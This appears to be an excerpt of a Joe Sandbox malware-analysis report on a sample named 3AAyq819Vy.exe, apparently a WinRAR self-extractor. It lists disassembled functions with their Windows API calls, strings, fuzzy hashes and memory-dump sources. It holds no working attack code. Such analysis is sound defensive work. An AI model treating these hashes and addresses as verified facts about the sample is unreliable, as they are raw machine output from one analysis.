                                                                                              • Opcode ID: 33de36c04a18531532a80de507fc1e3fee979134e951d5b0325b930577b594da
                                                                                              • Instruction ID: 48e5770b271d2b31f2a99f3c35ef2168832c1081158ba443130f047f96677e48
                                                                                              • Opcode Fuzzy Hash: 33de36c04a18531532a80de507fc1e3fee979134e951d5b0325b930577b594da
                                                                                              • Instruction Fuzzy Hash: E241FBB15083459FC710DF65C884AAFBBE9FB88314F44892EF996C2250E738E649DB52
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 00CA2536
                                                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                                                                • Part of subcall function 00CB05DA: _wcslen.LIBCMT ref: 00CB05E0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                              • String ID: ;%u$x%u$xc%u
                                                                                              • API String ID: 3053425827-2277559157
                                                                                              • Opcode ID: fb8bb202728c07608755bb8d790101ef1a32c3652cd4fa675f7289d475251fb5
                                                                                              • Instruction ID: a82f7c690878b7ea72cc495ec56ad8b9812c442f3f8ba043d28e4e7bba2a7351
                                                                                              • Opcode Fuzzy Hash: fb8bb202728c07608755bb8d790101ef1a32c3652cd4fa675f7289d475251fb5
                                                                                              • Instruction Fuzzy Hash: 00F168716043529BCB24DF2C84D5BFE77996F9230CF08456DFC869B283CB648A49D7A2
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: </p>$</style>$<br>$<style>$>
                                                                                              • API String ID: 176396367-3568243669
                                                                                              • Opcode ID: 6cc8543d3b7edaf92461e54abc5594595420a9e52a0d7faf9e14c4be95a393eb
                                                                                              • Instruction ID: 8ddb59badfdf87eaf157c227d1c6b33b07ee37b8d68a7ca5b5216e3e9cf78f92
                                                                                              • Opcode Fuzzy Hash: 6cc8543d3b7edaf92461e54abc5594595420a9e52a0d7faf9e14c4be95a393eb
                                                                                              • Instruction Fuzzy Hash: C851E56674036395DB309A769822BF673E0DFA1750F69442AFFD18B2C0FB75CE818261
                                                                                              APIs
                                                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00CCFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00CCF6CF
                                                                                              • __fassign.LIBCMT ref: 00CCF74A
                                                                                              • __fassign.LIBCMT ref: 00CCF765
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00CCF78B
                                                                                              • WriteFile.KERNEL32(?,00000000,00000000,00CCFE02,00000000,?,?,?,?,?,?,?,?,?,00CCFE02,00000000), ref: 00CCF7AA
                                                                                              • WriteFile.KERNEL32(?,00000000,00000001,00CCFE02,00000000,?,?,?,?,?,?,?,?,?,00CCFE02,00000000), ref: 00CCF7E3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1324828854-0
                                                                                              • Opcode ID: c58f7dbdaae0060e1faa650bfbe3b2dc10ce4bdd79ae408f4ae6a6a23157b047
                                                                                              • Instruction ID: 76a4c0ba8af459320be2e094976cda4bbcd3385f8fd01ee0d9d00af5c6e2c0e2
                                                                                              • Opcode Fuzzy Hash: c58f7dbdaae0060e1faa650bfbe3b2dc10ce4bdd79ae408f4ae6a6a23157b047
                                                                                              • Instruction Fuzzy Hash: 805141B19002499FDB10CFA8DC85FEEBBF5EF09310F14416EE555E7291D670AA42CBA1
                                                                                              APIs
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00CC2937
                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00CC293F
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00CC29C8
                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00CC29F3
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00CC2A48
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                              • String ID: csm
                                                                                              • API String ID: 1170836740-1018135373
                                                                                              • Opcode ID: 5914e531d034b6575fd9234da831537f40162a669b81923a9e105ea8c2f4f716
                                                                                              • Instruction ID: bb4c7b7e56d3235fab02c3f049201f1280f5cdc4f018ca9f2fdd4678b66c38be
                                                                                              • Opcode Fuzzy Hash: 5914e531d034b6575fd9234da831537f40162a669b81923a9e105ea8c2f4f716
                                                                                              • Instruction Fuzzy Hash: AE41D534E00248AFCF10EF69C885F9EBBB5EF44324F14805AE819AB392D771DA51DB91
                                                                                              APIs
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00CB9EEE
                                                                                              • GetWindowRect.USER32(?,00000000), ref: 00CB9F44
                                                                                              • ShowWindow.USER32(?,00000005,00000000), ref: 00CB9FDB
                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00CB9FE3
                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00CB9FF9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$RectText
                                                                                              • String ID: RarHtmlClassName
                                                                                              • API String ID: 3937224194-1658105358
                                                                                              • Opcode ID: 667abde37daee70284671fb4a908ba00774bd88d12186a8f2f950b7815841669
                                                                                              • Instruction ID: 13de0d52a234b3e9722d96dec1b1db3ed4de1cb01346f36e9779646f7f2a56a0
                                                                                              • Opcode Fuzzy Hash: 667abde37daee70284671fb4a908ba00774bd88d12186a8f2f950b7815841669
                                                                                              • Instruction Fuzzy Hash: 0F41A031008314EFCB216FA5EC48BAB7BACEF48711F008559F95A9A156DB34DA54CBA2
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                              • API String ID: 176396367-3743748572
                                                                                              • Opcode ID: fb61744195bf9a5fa91c6a51e3777648c7695ff135472f084e9fccc7974eff90
                                                                                              • Instruction ID: aeb9cff46b9f3cbfba9834b029291d1b94580589d7ee34d1338d83c6222083b2
                                                                                              • Opcode Fuzzy Hash: fb61744195bf9a5fa91c6a51e3777648c7695ff135472f084e9fccc7974eff90
                                                                                              • Instruction Fuzzy Hash: 8A31403264434556DA34AB54AC42BFB73A4EB50720F50842FFAA6972C0FB70EF4193A5
                                                                                              APIs
                                                                                                • Part of subcall function 00CCC868: _free.LIBCMT ref: 00CCC891
                                                                                              • _free.LIBCMT ref: 00CCC8F2
                                                                                                • Part of subcall function 00CC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?), ref: 00CC8DE2
                                                                                                • Part of subcall function 00CC8DCC: GetLastError.KERNEL32(?,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?,?), ref: 00CC8DF4
                                                                                              • _free.LIBCMT ref: 00CCC8FD
                                                                                              • _free.LIBCMT ref: 00CCC908
                                                                                              • _free.LIBCMT ref: 00CCC95C
                                                                                              • _free.LIBCMT ref: 00CCC967
                                                                                              • _free.LIBCMT ref: 00CCC972
                                                                                              • _free.LIBCMT ref: 00CCC97D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                              • Instruction ID: 8508b89f69b22fdd97d766211fc38b5f9eb3e7f9c7b61647e3a2991f987d99f6
                                                                                              • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                              • Instruction Fuzzy Hash: 20110D71980B05AAE520B7B1DC87FCB7BBC9F04B00F804C1DF29E660D2DA65E509A750
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00CBE669,00CBE5CC,00CBE86D), ref: 00CBE605
                                                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00CBE61B
                                                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00CBE630
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                              • API String ID: 667068680-1718035505
                                                                                              • Opcode ID: 0421938d4c7277efade8b5b8b26ca7339f29aad1d82403f1907fd04c228025e2
                                                                                              • Instruction ID: ce3ab5f329f79f99fd185c4e38cdc4581cc7bcbe8256b5c84833195bdee5a488
                                                                                              • Opcode Fuzzy Hash: 0421938d4c7277efade8b5b8b26ca7339f29aad1d82403f1907fd04c228025e2
                                                                                              • Instruction Fuzzy Hash: 74F0F635B8176A9F9F224F665C847EAB3C86E25F41B04043AFD15D3340FB10CE50ABA5
                                                                                              APIs
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB14C2
                                                                                                • Part of subcall function 00CAB146: GetVersionExW.KERNEL32(?), ref: 00CAB16B
                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CB14E6
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CB1500
                                                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00CB1513
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB1523
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB1533
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                                              • String ID:
                                                                                              • API String ID: 2092733347-0
                                                                                              • Opcode ID: 23132968e417fe9b39d11df200bc3493d4a4737a8e35205c5e93ecc36037a543
                                                                                              • Instruction ID: 967bfbffa5bbfcdbd7a5123f3705f1f41709e0e06e8edac2e1a57c0fa998103d
                                                                                              • Opcode Fuzzy Hash: 23132968e417fe9b39d11df200bc3493d4a4737a8e35205c5e93ecc36037a543
                                                                                              • Instruction Fuzzy Hash: 6931E875108346ABC704DFA8C884A9FB7F8BF98714F444A1EF999C3210E734D649CBA6
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,00CC2AF1,00CC02FC,00CBFA34), ref: 00CC2B08
                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CC2B16
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CC2B2F
                                                                                              • SetLastError.KERNEL32(00000000,00CC2AF1,00CC02FC,00CBFA34), ref: 00CC2B81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                              • String ID:
                                                                                              • API String ID: 3852720340-0
                                                                                              • Opcode ID: 818b522b8c979288e54f20ba6fea8aa2d3e7e9601857d8a47208cc810f70c4ba
                                                                                              • Instruction ID: 85018138de8df2f37b817aeca30a7f3bd3f3e3f2886447bb7474e985f1c3f899
                                                                                              • Opcode Fuzzy Hash: 818b522b8c979288e54f20ba6fea8aa2d3e7e9601857d8a47208cc810f70c4ba
                                                                                              • Instruction Fuzzy Hash: 8F01F23221A722AFE6642B75FC95F2F2B99EF41B74B60473FF122590E0EF115E01A244
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,00CE1030,00CC4674,00CE1030,?,?,00CC3F73,00000050,?,00CE1030,00000200), ref: 00CC97E9
                                                                                              • _free.LIBCMT ref: 00CC981C
                                                                                              • _free.LIBCMT ref: 00CC9844
                                                                                              • SetLastError.KERNEL32(00000000,?,00CE1030,00000200), ref: 00CC9851
                                                                                              • SetLastError.KERNEL32(00000000,?,00CE1030,00000200), ref: 00CC985D
                                                                                              • _abort.LIBCMT ref: 00CC9863
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 3160817290-0
                                                                                              • Opcode ID: 3e50cb498cc611eca23747828d66c7b2230e4fcc60a630e6bcd33f03257d9da0
                                                                                              • Instruction ID: f17bf1e2931b28f6c61db2aa5de233d0ab31d72a52a63d88c37acc99c74bff15
                                                                                              • Opcode Fuzzy Hash: 3e50cb498cc611eca23747828d66c7b2230e4fcc60a630e6bcd33f03257d9da0
                                                                                              • Instruction Fuzzy Hash: D9F0223610160266C6523338FC0EF2F2B69CFD2B35F25003DF629A31D2EE308D06A266
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CBDC47
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CBDC61
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBDC72
                                                                                              • TranslateMessage.USER32(?), ref: 00CBDC7C
                                                                                              • DispatchMessageW.USER32(?), ref: 00CBDC86
                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CBDC91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 2148572870-0
                                                                                              APIs
                                                                                                • Part of subcall function 00CB05DA: _wcslen.LIBCMT ref: 00CB05E0
                                                                                                • Part of subcall function 00CAB92D: _wcsrchr.LIBVCRUNTIME ref: 00CAB944
                                                                                              • _wcslen.LIBCMT ref: 00CAC197
                                                                                              • _wcslen.LIBCMT ref: 00CAC1DF
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: _wcslen$_wcsrchr
                                                                                              • String ID: .exe$.rar$.sfx
                                                                                              • API String ID: 3513545583-31770016
                                                                                              APIs
                                                                                              • GetTempPathW.KERNEL32(00000800,?), ref: 00CBCE9D
                                                                                                • Part of subcall function 00CAB690: _wcslen.LIBCMT ref: 00CAB696
                                                                                              • _swprintf.LIBCMT ref: 00CBCED1
                                                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                                                              • SetDlgItemTextW.USER32(?,00000066,00CE946A), ref: 00CBCEF1
                                                                                              • EndDialog.USER32(?,00000001), ref: 00CBCFFE
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                              • String ID: %s%s%u
                                                                                              • API String ID: 110358324-1360425832
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00CABB27
                                                                                              • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00CAA275,?,?,00000800,?,00CAA23A,?,00CA755C), ref: 00CABBC5
                                                                                              • _wcslen.LIBCMT ref: 00CABC3B
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: _wcslen$CurrentDirectory
                                                                                              • String ID: UNC$\\?\
                                                                                              • API String ID: 3341907918-253988292
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\3AAyq819Vy.exe,00000104), ref: 00CC7FAE
                                                                                              • _free.LIBCMT ref: 00CC8079
                                                                                              • _free.LIBCMT ref: 00CC8083
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: _free$FileModuleName
                                                                                              • String ID: C:\Users\user\Desktop\3AAyq819Vy.exe$`%y
                                                                                              • API String ID: 2506810119-4259162982
                                                                                              APIs
                                                                                              • LoadBitmapW.USER32(00000065), ref: 00CBB6ED
                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00CBB712
                                                                                              • DeleteObject.GDI32(00000000), ref: 00CBB744
                                                                                              • DeleteObject.GDI32(00000000), ref: 00CBB767
                                                                                                • Part of subcall function 00CBA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CBB73D,00000066), ref: 00CBA6D5
                                                                                                • Part of subcall function 00CBA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00CBB73D,00000066), ref: 00CBA6EC
                                                                                                • Part of subcall function 00CBA6C2: LoadResource.KERNEL32(00000000,?,?,?,00CBB73D,00000066), ref: 00CBA703
                                                                                                • Part of subcall function 00CBA6C2: LockResource.KERNEL32(00000000,?,?,?,00CBB73D,00000066), ref: 00CBA712
                                                                                                • Part of subcall function 00CBA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00CBB73D,00000066), ref: 00CBA72D
                                                                                                • Part of subcall function 00CBA6C2: GlobalLock.KERNEL32(00000000), ref: 00CBA73E
                                                                                                • Part of subcall function 00CBA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00CBA762
                                                                                                • Part of subcall function 00CBA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CBA7A7
                                                                                                • Part of subcall function 00CBA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00CBA7C6
                                                                                                • Part of subcall function 00CBA6C2: GlobalFree.KERNEL32(00000000), ref: 00CBA7CD
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                              • String ID: ]
                                                                                              • API String ID: 1797374341-3352871620
                                                                                              APIs
                                                                                                • Part of subcall function 00CA1316: GetDlgItem.USER32(00000000,00003021), ref: 00CA135A
                                                                                                • Part of subcall function 00CA1316: SetWindowTextW.USER32(00000000,00CD35F4), ref: 00CA1370
                                                                                              • EndDialog.USER32(?,00000001), ref: 00CBD64B
                                                                                              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00CBD661
                                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00CBD675
                                                                                              • SetDlgItemTextW.USER32(?,00000068), ref: 00CBD684
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: RENAMEDLG
                                                                                              • API String ID: 445417207-3299779563
                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00CC7E24,00000000,?,00CC7DC4,00000000,00CDC300,0000000C,00CC7F1B,00000000,00000002), ref: 00CC7E93
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CC7EA6
